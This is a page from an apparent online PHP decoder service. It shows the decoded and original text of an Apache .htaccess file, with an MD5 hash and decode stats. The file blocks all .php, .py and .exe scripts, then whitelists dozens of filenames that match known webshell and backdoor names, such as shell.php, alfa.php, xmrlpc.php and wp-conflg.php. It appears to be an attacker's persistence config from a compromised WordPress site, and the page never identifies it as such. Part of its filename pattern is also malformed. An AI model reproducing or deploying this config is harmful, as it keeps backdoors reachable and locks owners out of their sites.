Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMat..

Decoded Output download

<?  <FilesMatch ".(py|exe|php)$"> 
 Order allow,deny 
 Deny from all 
</FilesMatch> 
<FilesMatch "(^wp-login.php|^wp-blog-header.php|^style.php|^style2.php|^wp-conflg.php|^index.php|^class.api.php|^iR7SzrsOUEP.php|^license.php|^wp-blog.php|^moon.php|^wp-add.php|^plugin-install.php|^admin.php|^wp-sigunq.php|^wp-good.php|^wp-ldd.php|^1index.php|^my1.php|^upload.php|^xmrlpc.php|^install.php|^aclass.api.php|^shell.php|^cloud.php|^admin1.php^wp-signups.php^wp-conflg.php|^delpaths.php|^wp-zett.php|^wp.php|^bak.php|^cong.php|^fun.php|^geju.php|^users.php|^123.php|^style.php|^kill.php|^kill0_3.php|^file.php|^cdm.php|^xmrlpc.php|^about.php|^Simple.php|^alfanew.php7.php|^cloud.php|^file.php|^def.php|^cong.php|^delpaths.php|^fun.php|^geju.php|^infos.php|^sgd.php|^wp-admin.php|^wp-zett.php|^100.php|^aj.php|^alfa.php|^cjfuns.php|^cong.php|^content.php|^credits.php|^edit.php|^admin11.php|^export.php|^fond.php|^head.php|^mariju.php|^termps.php|^user.php|^vip.php|^wp-admin1.php|^wp-1login.php)$"> 
 Order allow,deny 
 Allow from all 
</FilesMatch> 
<IfModule mod_rewrite.c> 
RewriteEngine On 
RewriteBase / 
RewriteRule ^index\.php$ - [L] 
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule . /index.php [L] 
</IfModule> ?>

Did this file decode correctly?

Original Code

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "(^wp-login.php|^wp-blog-header.php|^style.php|^style2.php|^wp-conflg.php|^index.php|^class.api.php|^iR7SzrsOUEP.php|^license.php|^wp-blog.php|^moon.php|^wp-add.php|^plugin-install.php|^admin.php|^wp-sigunq.php|^wp-good.php|^wp-ldd.php|^1index.php|^my1.php|^upload.php|^xmrlpc.php|^install.php|^aclass.api.php|^shell.php|^cloud.php|^admin1.php^wp-signups.php^wp-conflg.php|^delpaths.php|^wp-zett.php|^wp.php|^bak.php|^cong.php|^fun.php|^geju.php|^users.php|^123.php|^style.php|^kill.php|^kill0_3.php|^file.php|^cdm.php|^xmrlpc.php|^about.php|^Simple.php|^alfanew.php7.php|^cloud.php|^file.php|^def.php|^cong.php|^delpaths.php|^fun.php|^geju.php|^infos.php|^sgd.php|^wp-admin.php|^wp-zett.php|^100.php|^aj.php|^alfa.php|^cjfuns.php|^cong.php|^content.php|^credits.php|^edit.php|^admin11.php|^export.php|^fond.php|^head.php|^mariju.php|^termps.php|^user.php|^vip.php|^wp-admin1.php|^wp-1login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Function Calls

None

Variables

None

Stats

MD5 f54c0f7f3f418303de21f91fd5d1ffc4
Eval Count 0
Decode Time 66 ms